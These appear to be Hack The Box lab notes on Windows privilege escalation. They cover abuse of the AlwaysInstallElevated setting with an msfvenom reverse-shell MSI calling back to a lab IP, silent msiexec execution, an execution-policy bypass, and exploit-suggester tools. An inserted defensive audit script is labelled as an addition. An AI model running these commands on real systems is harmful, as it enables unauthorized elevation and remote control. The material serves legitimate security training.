Other Techniques
Abuse Always Install Elevated Settings
Enum
PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
or
PS C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
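Windows Installer applies this policy only when AlwaysInstallElevated is 1 in both the machine hive and the user hive, so an audit has to read the two together. The following PowerShell check is an added example, not part of the original notes; the function names `Get-AieValue` and `Test-AlwaysInstallElevated` are hypothetical, and it assumes an elevated session so that other users' loaded hives are readable.

```powershell
# Added example: audit AlwaysInstallElevated in HKLM and in every loaded user hive.
$SubKey = 'Software\Policies\Microsoft\Windows\Installer'

function Get-AieValue {
    param([Parameter(Mandatory)][string]$Path)
    # Returns the DWORD as an int, or $null when the key/value is absent or unreadable.
    $item = Get-ItemProperty -Path $Path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -ne $item) { return [int]$item.AlwaysInstallElevated }
    return $null
}

function Test-AlwaysInstallElevated {
    $machine = Get-AieValue -Path "Registry::HKEY_LOCAL_MACHINE\$SubKey"

    # HKCU only covers the calling user; HKEY_USERS holds every profile currently loaded.
    # The pattern keeps real account SIDs and skips the *_Classes hives and service SIDs.
    $userSids = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } |
        Select-Object -ExpandProperty PSChildName

    foreach ($sid in $userSids) {
        $user = Get-AieValue -Path "Registry::HKEY_USERS\$sid\$SubKey"
        [pscustomobject]@{
            Sid          = $sid
            MachineValue = $machine
            UserValue    = $user
            # The policy is in effect for this user only when both values are 1.
            Effective    = ($machine -eq 1 -and $user -eq 1)
        }
    }
}

# One row per loaded user profile; Effective = True marks an exposed account.
Test-AlwaysInstallElevated | Format-Table -AutoSize
```

Any row with `Effective` set to True means the "Always install with elevated privileges" Group Policy setting is enabled for that user and should be disabled in both the Computer and User configuration.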
Create an MSI package for the exploit
endy21@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
Execute
C:\htb> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
Exploit suggester
Windows desktop
On a Windows desktop, you can run windows-exploit-suggester.py for automated recon.
Install dependencies
endy21@htb[/htb]$ sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
endy21@htb[/htb]$ sudo tar -xf setuptools-2.0.tar.gz
endy21@htb[/htb]$ cd setuptools-2.0/
endy21@htb[/htb]$ sudo python2.7 setup.py install
endy21@htb[/htb]$ sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
endy21@htb[/htb]$ sudo tar -xf xlrd-1.0.0.tar.gz
endy21@htb[/htb]$ cd xlrd-1.0.0/
endy21@htb[/htb]$ sudo python2.7 setup.py install
Gather system information
C:\htb> systeminfo
Host Name: WINLPE-WIN7
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: mrb3n
Registered Organization:
Product ID: 00371-222-9819843-86644
Original Install Date: 3/25/2021, 7:23:47 PM
System Boot Time: 5/13/2021, 5:14:12 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
<SNIP>
Run the tool
endy21@htb[/htb]$ sudo python2.7 windows-exploit-suggester.py --update
endy21@htb[/htb]$ python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt
Windows Server
On Windows Server, you can run Sherlock.ps1 to check.
PS C:\htb> Set-ExecutionPolicy bypass -Scope process
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic. Do you want to change the execution
policy?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
PS C:\htb> Import-Module .\Sherlock.ps1
PS C:\htb> Find-AllVulns